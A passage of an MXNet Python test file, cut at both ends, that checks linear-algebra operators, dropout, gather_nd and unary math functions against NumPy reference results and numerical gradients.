test_trmm2 = mx.sym.linalg.trmm(data1_ltri, data2, alpha=-2., lower=lower)
r = rep_3x(-2. * np.dot(trian, matrix), 4, 4)
check_fw_grad(test_trmm2, a, [r])
test_trmm3 = mx.sym.linalg.trmm(data1_ltri, data2, rightside=True, lower=lower)
r = rep_3x(np.dot(matrix, trian), 4, 4)
check_fw_grad(test_trmm3, a, [r])
test_trmm4 = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=1.2, transpose=True, lower=lower)
r = rep_3x(1.2 * np.dot(trian.T, matrix), 4, 4)
check_fw_grad(test_trmm4, a, [r])
# test sumlogdiag
r = np.reshape(np.tile(10. * np.log(np.array([2.])), 3), (3,))
check_fw_grad(test_sumlogdiag, [rep_3x(pow, 4, 4)], [r])
# Tests for operators linalg.syrk, linalg.gelqf
def _gelqf_combined_symbol(a):
q, l = mx.sym.linalg.gelqf(a)
q_qt = mx.sym.linalg.syrk(q, transpose=False, alpha=1., name='Q_times_Qt')
l_q = mx.sym.linalg.trmm(l, q, alpha=1., name='L_times_Q')
return mx.sym.Group([q_qt, l_q])
# NOTE: If the unused output is left dangling, things break for dtype=np.float64: the
# backward gradient for the unused output then comes back as np.float32. The helpers
# below therefore fold the unused output in via a zero-valued BlockGrad term.
def _gelqf_first_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(l), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(q, bogus_scal)
def _gelqf_second_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(q), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(l, bogus_scal)
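# A numpy sketch of the LQ factorization that linalg.gelqf computes (A = L @ Q with the
# rows of Q orthonormal), obtained here from the QR factorization of A.T. Illustrative
# only; sign conventions may differ from the MXNet operator.
def _np_gelqf_reference(a):
    q_t, r_t = np.linalg.qr(a.T)
    return r_t.T, q_t.T  # (L, Q) with a ~= L @ Q and Q @ Q.T ~= identity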
def _syevd_combined_symbol(a):
u, lam = mx.sym.linalg.syevd(a)
u_ut = mx.sym.linalg.syrk(u, transpose=False, alpha=1., name='U_times_Ut')
lam_u = mx.sym.broadcast_mul(mx.sym.reshape(lam, shape=(-2, 1)), u)
ut_lam_u = mx.sym.linalg.gemm2(u, lam_u, alpha=1., transpose_a=True,
transpose_b=False, name='Ut_L_U')
return mx.sym.Group([u_ut, ut_lam_u])
def test_laop_2():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
# Tests for linalg.syrk
mnalpha_lst = [(2, 3, 1.), (5, 3, -2.), (1, 6, 5.), (3, 3, 0.5), (4, 1, 10.), (1, 1, 1.)]
for m, n, alpha in mnalpha_lst:
#print('syrk: m={}, n={}, alpha={}'.format(m, n, alpha))
data_in1 = np.random.uniform(1, 10, (m, n))
res_syrk1 = alpha * np.dot(data_in1, data_in1.T)
test_syrk1 = mx.sym.linalg.syrk(data1, transpose=False, alpha=alpha)
check_fw(test_syrk1, [data_in1], [res_syrk1])
if grad_check == 1:
check_grad(test_syrk1, [data_in1])
res_syrk2 = alpha * np.dot(data_in1.T, data_in1)
test_syrk2 = mx.sym.linalg.syrk(data1, transpose=True, alpha=alpha)
check_fw(test_syrk2, [data_in1], [res_syrk2])
if grad_check == 1:
check_grad(test_syrk2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
r1_batch = rep_3x(res_syrk1, m, m)
check_fw(test_syrk1, [a_batch], [r1_batch])
if grad_check == 1:
check_grad(test_syrk1, [a_batch])
r2_batch = rep_3x(res_syrk2, n, n)
check_fw(test_syrk2, [a_batch], [r2_batch])
if grad_check == 1:
check_grad(test_syrk2, [a_batch])
# Tests for linalg.gelqf
# Currently disabled on GPU, as gelqf needs CUDA 8
# while MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
test_gelqf2 = _gelqf_combined_symbol(data1) # Outputs (dot(Q, Q.T), dot(L, Q))
test_gelqf_q = _gelqf_first_output(data1) # Output Q (L is not dangling)
test_gelqf_l = _gelqf_second_output(data1) # Output L (Q is not dangling)
mn_lst = [(4, 4), (1, 1), (5, 20), (1, 10), (15, 50)]
for m, n in mn_lst:
#print('gelqf: m={}, n={}'.format(m, n))
data_in1 = np.random.normal(0., 10., (m, n))
res_eye = np.eye(m)
res_a = data_in1
check_fw(test_gelqf2, [data_in1], [res_eye, res_a])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [data_in1])
# A => L
check_grad(test_gelqf_l, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
reye_batch = rep_3x(res_eye, m, m)
ra_batch = a_batch
check_fw(test_gelqf2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [a_batch])
# A => L
check_grad(test_gelqf_l, [a_batch])
# Tests for operator linalg.syevd
def _syevd_first_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(lam), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(u, bogus_scal)
def _syevd_second_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(u), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(lam, bogus_scal)
def _syevd_forward(a):
lam, ut = np.linalg.eig(a)
ind = np.argsort(lam)
lam = lam[ind]
u = ut[:, ind].T
for i in range(0, a.shape[0]):
_syevd_forw_eigvec_sign(u[i])
return u, lam
def _syevd_forw_eigvec_sign(v):
ind = np.argmax(np.abs(v))
if v[ind] < 0.:
v[:] = -v
def _syevd_backward(grad_u, grad_l, u, l):
n = l.size
assert grad_l.size == n
assert grad_u.shape == (n, n)
assert u.shape == (n, n)
temp = np.dot(grad_u, u.T)
temp2 = np.diag(grad_l)
for i in range(1, n):
for j in range(0, i):
denom = 2. * (l[i] - l[j])
elem = (temp[i, j] - temp[j, i])/denom
temp2[i, j] = elem
temp2[j, i] = elem
temp3 = np.dot(u.T, temp2)
return np.dot(temp3, u)
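# For reference, _syevd_backward above implements the analytic gradient of the symmetric
# eigendecomposition used by linalg.syevd: with T = dU @ U.T it forms the symmetric matrix
# M with M[i, i] = dl[i] and M[i, j] = (T[i, j] - T[j, i]) / (2 * (l[i] - l[j])) for i != j,
# and returns dA = U.T @ M @ U. Distinct eigenvalues are assumed, which the random
# symmetric test matrices satisfy with probability one.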
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(1896893923)
def test_laop_3():
# Currently disabled on GPU, as syevd needs CUDA 8
# while MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
dtype = np.float64
rtol_fw = 1e-6
atol_fw = 1e-6
num_eps = 1e-4
rtol_bw = 1e-2
atol_bw = 1e-2
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol_fw, atol=atol_fw, dtype=dtype)
# Tests for linalg.syevd
test_syevd2 = _syevd_combined_symbol(data1) # Outputs (U U^T, U^T (diag L) U)
data1_s2 = _make_symm_symbol(data1, ndims=2)
test_syevd_u_2 = _syevd_first_output(data1_s2)
test_syevd_l_2 = _syevd_second_output(data1_s2)
data1_s4 = _make_symm_symbol(data1, ndims=4)
test_syevd_u_4 = _syevd_first_output(data1_s4)
test_syevd_l_4 = _syevd_second_output(data1_s4)
n_lst = [4, 1, 2, 10, 14]
for n in n_lst:
#print('\n** syevd: n={}'.format(n))
data_in1 = np.random.normal(0., 10., (n, n))
data_in1 = 0.5 * (data_in1 + data_in1.T)
res_eye = np.eye(n)
res_a = data_in1
check_fw(test_syevd2, [data_in1], [res_eye, res_a])
# Check backward
grad_u = np.random.normal(0., 2., (n, n))
grad_l = np.random.normal(0., 2., (n,))
bw_u, bw_l = _syevd_forward(data_in1)
grad_a = _syevd_backward(grad_u, grad_l, bw_u, bw_l)
check_bw(mx.sym.linalg.syevd(data1), [data_in1], [grad_u, grad_l], [grad_a])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_2, [data_in1])
# A => L
check_grad(test_syevd_l_2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, n, n)
reye_batch = rep_3x(res_eye, n, n)
ra_batch = a_batch
check_fw(test_syevd2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_4, [a_batch])
# A => L
check_grad(test_syevd_l_4, [a_batch])
# @piyushghai - Removing the fixed seed for this test.
# Issue for flakiness is tracked at - https://github.com/apache/incubator-mxnet/issues/11721
def test_laop_4():
# Currently disabled on GPU, as syevd needs CUDA 8
# while MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
rtol_fw = 1e-6
atol_fw = 1e-6
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected, dtype :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
a_np = np.array([[1., 2.], [2., 4.]])
u_np = np.array([[0.89442718, -0.44721359], [0.44721359, 0.89442718]])
l_np = np.array([0., 5.])
test_syevd = mx.sym.linalg.syevd(data1)
# float64
#print('float64')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float64)
# float32
#print('float32')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float32)
def test_laop_5():
# tests for diagonal and triangular matrix extraction and generation
data = mx.symbol.Variable('data')
# test complete range of small matrices to cover corner cases
for n in range(1, 5):
# test batched and non-batched processing
for b in range(3):
shape = (n, n) if b == 0 else (b, n, n)
data_in = np.random.uniform(1, 10, shape)
# test all legal offsets of the diagonal
for offs in range(1-n, n):
# test extraction of diagonal
test_diag = mx.sym.linalg.extractdiag(data, offset=offs)
res_diag = np.diagonal(data_in, offset=offs) if b==0 else np.diagonal(data_in, axis1=1, axis2=2, offset=offs)
check_symbolic_forward(test_diag, [data_in], [res_diag])
check_numeric_gradient(test_diag, [data_in])
# test generation of diagonal matrix
test_diag2 = mx.sym.linalg.makediag(data, offset=offs)
res_diag2 = None
if b == 0:
res_diag2 = np.diagflat(res_diag, k=offs)
else:
for i in range(b):
res = np.reshape(np.diagflat(res_diag[i], k=offs), (1, n, n))
res_diag2 = res if res_diag2 is None else np.concatenate((res_diag2, res), axis=0)
check_symbolic_forward(test_diag2, [res_diag], [res_diag2])
check_numeric_gradient(test_diag2, [res_diag])
# check both settings for parameter "lower" in case of zero offset
lower_vals = [True] if offs != 0 else [True, False]
for lower in lower_vals:
# test extraction of a triangle by doing a full roundtrip, as the intermediate extracted
# triangle has a different ordering than numpy's
test_trian = mx.sym.linalg.extracttrian(data, offset=offs, lower=lower)
test_trian = mx.sym.linalg.maketrian(test_trian, offset=offs, lower=lower)
extracts_lower = (offs < 0) or ((offs == 0) and lower)
res_trian = None
if b == 0:
res_trian = np.tril(data_in, offs) if extracts_lower else np.triu(data_in, offs)
else:
for i in range(b):
res = np.tril(data_in[i], offs) if extracts_lower else np.triu(data_in[i], offs)
res = np.reshape(res, (1, n, n))
res_trian = res if res_trian is None else np.concatenate((res_trian, res), axis=0)
check_symbolic_forward(test_trian, [data_in], [res_trian])
check_numeric_gradient(test_trian, [data_in])
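# NumPy sketch of the non-batched diagonal roundtrip checked above: extractdiag corresponds
# to np.diagonal and makediag to np.diagflat with the same offset. Illustrative only.
def _np_diag_roundtrip(a, offset=0):
    d = np.diagonal(a, offset=offset)
    return d, np.diagflat(d, k=offset)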
# Tests for linalg.inverse
@pytest.mark.skip(reason="Test crashes https://github.com/apache/incubator-mxnet/issues/15975")
def test_laop_6():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-4
atol_bw = 1e-6
data = mx.symbol.Variable('data')
check_fw = lambda sym, location, expected:\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
## det(I + dot(v, v.T)) = 1 + dot(v.T, v) >= 1, so it's always invertible;
## det is away from zero, so the value of logdet is stable
v = np.random.random(4)
a = np.eye(4) + np.outer(v, v)
a = np.tile(a, (3, 1, 1))
permute_mat = np.eye(4)[[1, 0, 2, 3]]
# test matrix inverse
r = np.eye(4)
r = np.tile(r, (3, 1, 1))
test_inverse = mx.sym.linalg.inverse(data)
test_eye = mx.sym.linalg.gemm2(data, test_inverse)
check_fw(test_eye, [a], [r])
check_grad(test_inverse, [a])
# test matrix determinant
# det
r = np.linalg.det(a)
test_det = mx.sym.linalg.det(data)
check_fw(test_det, [a], [r])
check_grad(test_det, [a])
# test slogdet
r1 = np.array([1., 1., 1.])
r2 = np.log(np.abs(np.linalg.det(a)))
test_sign, test_logabsdet = mx.sym.linalg.slogdet(data)
check_fw(test_sign, [a], [r1])
check_fw(test_sign, [np.dot(a, permute_mat)], [-r1])
check_fw(test_logabsdet, [a], [r2])
check_grad(test_logabsdet, [a])
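# Quick numpy sanity check (illustrative, not called by the tests) of the identity used
# above to build a well-conditioned input: det(I + v v^T) = 1 + v^T v >= 1.
def _check_det_lemma(v):
    lhs = np.linalg.det(np.eye(v.size) + np.outer(v, v))
    rhs = 1.0 + np.dot(v, v)
    return np.isclose(lhs, rhs)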
def test_stack():
for _ in range(100):
ndim = random.randint(1, 5)
axis = random.randint(0, ndim)
if random.randint(0, 1):
axis = axis - ndim - 1
nin = random.randint(1, 3)
dshape = [random.randint(1, 5) for _ in range(ndim)]
inputs = [np.random.uniform(size=dshape) for _ in range(nin)]
output = np.stack(inputs, axis=axis)
sym_ins = [mx.sym.var('x%d'%i) for i in range(nin)]
out = mx.sym.stack(*sym_ins, axis=axis)
check_symbolic_forward(out, inputs, [output])
check_numeric_gradient(out, inputs)
@pytest.mark.flaky
def test_dropout():
def zero_count(array, ratio):
zeros = 0
for i in array:
if i == 0:
zeros += 1
elif math.isnan(i):
assert ratio == 1 # Only valid for ratio = 1
zeros += 1
return zeros
def check_correctness(executor, input, ratio):
input = input.ravel()
output = executor.outputs[0].asnumpy().ravel()
input_sum = np.sum(input)
output_sum = np.sum(output)
# Sanity-check the test data: the input should contain no zeros
assert zero_count(input, ratio) == 0
# count number of zeroes in output
output_zeroes = zero_count(output, ratio)
# The relative error between input and output sums should stay below ratio/2
error = abs(output_sum - input_sum) / input_sum
if ratio == 1.0:
assert output_zeroes == len(input)
elif ratio > 0.2:
assert output_zeroes > 0
assert error < (ratio/2)
elif ratio == 0:
assert output_zeroes == 0
def check_dropout_ratio(ratio, shape, cudnn_off=True):
# test dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, cudnn_off=cudnn_off)
exe = y._simple_bind(ctx=default_context(), data=shape)
if ratio == 1:
max_value = float('nan')
else:
max_value = 1 if ratio == 0 else 1/ratio
if ratio == 1:
min_value = float('nan')
else:
min_value = 1 if ratio == 0 else 0
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
if not math.isnan(max_value):
assert exe.outputs[0].asnumpy().max() > 0
else:
assert math.isnan(exe.outputs[0].asnumpy().max())
if not math.isnan(min_value):
assert exe.outputs[0].asnumpy().min() == min_value
else:
assert math.isnan(exe.outputs[0].asnumpy().min())
check_correctness(exe, exe.arg_arrays[0].asnumpy(), ratio)
if ratio == 0.5:
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert (exe.outputs[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
# test permanent dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, mode='always', cudnn_off=cudnn_off)
exe = y._simple_bind(ctx=default_context(), data=shape)
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
def get_slice(x, axis, idx):
ix = ()
for i in range(x.ndim):
if i == axis:
ix += (idx,)
else:
ix += (slice(None, None, None),)
return x[ix]
def check_dropout_axes(ratio, shape, axes, cudnn_off=True):
compactshape = list(shape)
for axis in axes:
compactshape[axis] = 1
compactx = mx.random.uniform(shape=tuple(compactshape))
broadcastx = compactx.broadcast_to(shape)
dropouty = mx.nd.Dropout(broadcastx, p=ratio, axes=axes, cudnn_off=cudnn_off)
for axis in axes:
target = get_slice(dropouty, axis, 0).asnumpy()
for i in range(1, shape[axis]):
assert(get_slice(dropouty, axis, i).asnumpy() == target).all()
def check_passthrough(ratio, shape, cudnn_off=True):
# test inference_mode forward and then backward
a = mx.random.uniform(shape=shape)
a.attach_grad()
with mx.autograd.record(train_mode=False):
b = mx.nd.Dropout(a, ratio, cudnn_off=cudnn_off) # dropout acts as identity
b.backward()
assert_almost_equal(a.grad.asnumpy(), mx.nd.ones_like(b).asnumpy())
shape = (100, 100)
check_dropout_ratio(0.5, shape)
check_dropout_ratio(0.0, shape)
check_dropout_ratio(1.0, shape)
check_dropout_ratio(0.75, shape)
check_dropout_ratio(0.25, shape)
check_dropout_ratio(0.5, shape, cudnn_off=False)
check_dropout_ratio(0.0, shape, cudnn_off=False)
check_dropout_ratio(1.0, shape, cudnn_off=False)
check_dropout_ratio(0.75, shape, cudnn_off=False)
check_dropout_ratio(0.25, shape, cudnn_off=False)
check_passthrough(0.5, shape)
check_passthrough(0.0, shape)
check_passthrough(1.0, shape)
check_passthrough(0.5, shape, cudnn_off=False)
check_passthrough(0.0, shape, cudnn_off=False)
check_passthrough(1.0, shape, cudnn_off=False)
nshape = (10, 10, 10, 10)
with mx.autograd.train_mode():
check_dropout_axes(0.25, nshape, axes = (0,))
check_dropout_axes(0.25, nshape, axes = (1,))
check_dropout_axes(0.25, nshape, axes = (2,))
check_dropout_axes(0.25, nshape, axes = (3,))
check_dropout_axes(0.25, nshape, axes = (0, 1))
check_dropout_axes(0.25, nshape, axes = (0, 2))
check_dropout_axes(0.25, nshape, axes = (0, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2))
check_dropout_axes(0.25, nshape, axes = (1, 3))
check_dropout_axes(0.25, nshape, axes = (2, 3))
check_dropout_axes(0.25, nshape, axes = (0, 1, 2))
check_dropout_axes(0.25, nshape, axes = (0, 2, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2, 3))
check_dropout_axes(0.25, nshape, axes = (0,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (3,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2, 3), cudnn_off=False)
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/11290")
def test_scatter_gather_nd():
def check(data, idx):
data.attach_grad()
with mx.autograd.record():
y = mx.nd.gather_nd(data, idx)
y.backward(y)
npidx = tuple(i.asnumpy() for i in idx)
assert (data.asnumpy()[npidx] == y.asnumpy()).all()
npdata = np.zeros_like(data.asnumpy())
npdata[npidx] = y.asnumpy()
assert (npdata == data.grad.asnumpy()).all()
assert (mx.nd._internal._backward_gather_nd(y, idx, shape=data.shape).asnumpy() == data.grad.asnumpy()).all()
for dtype in ['int32', 'int64', 'float16', 'float32', 'float64']:
data = mx.nd.arange(360, dtype=dtype).reshape((3,4,5,6))
idx = mx.nd.array([[1,1,2], [3, 3, 0], [3,2,1]], dtype='int32')
check(data, idx)
idx = mx.nd.array([[1,1,2], [3,3,0], [3,2,1], [5,2,4]], dtype='int32')
check(data, idx)
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [0, 1, 0]], dtype='int32')
assert (mx.nd.scatter_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [2, 3]]).all()
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [1, 1, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [0, 5]]).all()
data_npy = np.random.randint(0, 10, (100,))
data = mx.nd.array(data_npy, dtype=dtype)
idx = mx.nd.zeros(shape=(1, 100), dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data_npy.sum())
if dtype == 'int64':
data = mx.nd.array([2123162361283621, -31231236374787,
-112372937128970, -1378278798172378], dtype=dtype)
idx = mx.nd.array([[0, 0, 0, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data.asnumpy().sum())
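# NumPy sketch of the gather_nd semantics exercised above: with indices of shape (M, N)
# addressing the first M axes of data, output[n] = data[indices[0, n], ..., indices[M-1, n]].
# The helper below is illustrative only and mirrors the npidx construction in check().
def _np_gather_nd_reference(data_np, indices_np):
    return data_np[tuple(indices_np)]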
def test_gather_nd_check_bound():
def _test_gather_nd_exception(data, indices):
output = mx.nd.gather_nd(data, indices).asnumpy()
# check if indices is out of bound
data = mx.nd.array([[0, 1, 2], [3, 4, 5]])
indices1 = mx.nd.array([[0, 1, 0], [0, 1, 3]])
indices2 = mx.nd.array([[0, 1, 0], [0, 1, -5]])
assertRaises(IndexError, _test_gather_nd_exception, data, indices1)
# IndexError: index 3 is out of bounds for axis 1 with size 3
assertRaises(IndexError, _test_gather_nd_exception, data, indices2)
# IndexError: index -5 is out of bounds for axis 1 with size 3
# check if the negative indices are wrapped correctly
indices1 = mx.nd.array([[0, 1, -1], [0, 1, -2]])
indices2 = mx.nd.array([[0, 1, 1], [0, 1, 1]])
data1 = mx.nd.gather_nd(data, indices1)
data2 = mx.nd.gather_nd(data, indices2)
assert_almost_equal(data1, data2, rtol=1e-5, atol=1e-5)
def compare_forw_backw_unary_op(
name, forward_mxnet_call, forward_numpy_call,
backward_numpy_call, shape, input_low, input_high, rtol, atol,
dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
data = mx.symbol.Variable(op_name + '_data', dtype=dtype)
# Comparison: Forward expression
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
res_np = forward_numpy_call(data_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_fw(op_ex, [data_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data_grad = backward_numpy_call(data_np) * res_grad
check_bw(op_ex, [data_np], [res_grad], [data_grad])
def finite_diff_unary_op(
name, forward_mxnet_call, shape, input_low, input_high, rtol, atol,
num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
data = mx.symbol.Variable('data', dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_grad(op_ex, [data_np])
def np_smooth_l1(x, sigma):
issq = 1. / sigma / sigma
absx = np.abs(x)
temp = x * sigma
return np.where(absx < issq, 0.5 * (temp ** 2), absx - 0.5 * issq)
def np_smooth_l1_grad(x, sigma):
ssq = sigma * sigma
return np.where(np.abs(x) < 1. / ssq, x * ssq, np.sign(x))
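# Worked example of the smooth-L1 definition above for sigma = 1 (so 1/sigma^2 = 1):
#   f(x) = 0.5 * x^2   for |x| < 1   e.g. f(0.5) = 0.125
#   f(x) = |x| - 0.5   otherwise     e.g. f(2.0) = 1.5
# and the gradient switches accordingly: f'(0.5) = 0.5, f'(2.0) = 1.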
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(192837465)
def test_unary_math_operators():
have_scipy = True
try:
from scipy import special as scipy_special
except ImportError:
print("Could not import scipy. Skipping unit tests for special functions")
have_scipy = False
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
rtol_less_l = [1e-6, 1e-5, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
atol_less_l = [1e-6, 1e-5, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'arccos' : [lambda x: mx.sym.arccos(x),
lambda x: np.arccos(x),
lambda x: -1. / np.sqrt(1. - x ** 2.),
-0.95, 0.95],
'arccosh': [lambda x: mx.sym.arccosh(x),
lambda x: np.arccosh(x),
lambda x: 1. / np.sqrt(x ** 2 - 1.),
1.05, 10.0],
'arcsin': [lambda x: mx.sym.arcsin(x),
lambda x: np.arcsin(x),
lambda x: 1. / np.sqrt(1. - x ** 2),
-0.95, 0.95],
'arcsinh': [lambda x: mx.sym.arcsinh(x),
lambda x: np.arcsinh(x),
lambda x: 1. / np.sqrt(x**2 + 1.),
-5.0, 5.0],
'arctan': [lambda x: mx.sym.arctan(x),
lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.),
-5.0, 5.0],
'arctanh': [lambda x: mx.sym.arctanh(x),
lambda x: np.arctanh(x),
lambda x: 1. / (1. - x ** 2),
-0.95, 0.95],
'cbrt': [lambda x: mx.sym.cbrt(x),
lambda x: np.cbrt(x),
lambda x: 1. / (3. * np.cbrt(x) ** 2),
-10.0, 10.0],
'cos': [lambda x: mx.sym.cos(x),
lambda x: np.cos(x),
lambda x: -np.sin(x),
-5.0, 5.0],
'cosh': [lambda x: mx.sym.cosh(x),
lambda x: np.cosh(x),
lambda x: np.sinh(x),
-2.0, 2.0],
'exp': [lambda x: mx.sym.exp(x),
lambda x: np.exp(x),
lambda x: np.exp(x),
-4.0, 4.0],
'expm1': [lambda x: mx.sym.expm1(x),
lambda x: np.expm1(x),
lambda x: np.exp(x),
-0.1, 0.1],
'log': [lambda x: mx.sym.log(x),
lambda x: np.log(x),
lambda x: 1. / x,
0.01, 100.0],
'log10': [lambda x: mx.sym.log10(x),
lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)),
0.01, 100.0],
'log2': [lambda x: mx.sym.log2(x),
lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)),
0.01, 100.0],
'log1p': [lambda x: mx.sym.log1p(x),
lambda x: np.log1p(x),
lambda x: 1. / (1. + x),
-0.1, 0.1],
'rcbrt': [lambda x: mx.sym.rcbrt(x),
lambda x: 1. / np.cbrt(x),
lambda x: -1. / (3. * x * np.cbrt(x)),
0.01, 100.0],
'reciprocal': [lambda x: mx.sym.reciprocal(x),
lambda x: 1. / x,
lambda x: -1. / (x ** 2),
0.01, 100.0],
'relu': [lambda x: mx.sym.relu(x),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'rsqrt': [lambda x: mx.sym.rsqrt(x),
lambda x: 1. / np.sqrt(x),
lambda x: -0.5 / (x * np.sqrt(x)),
0.01, 100.0],
'sigmoid': [lambda x: mx.sym.sigmoid(x),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.softsign(x),
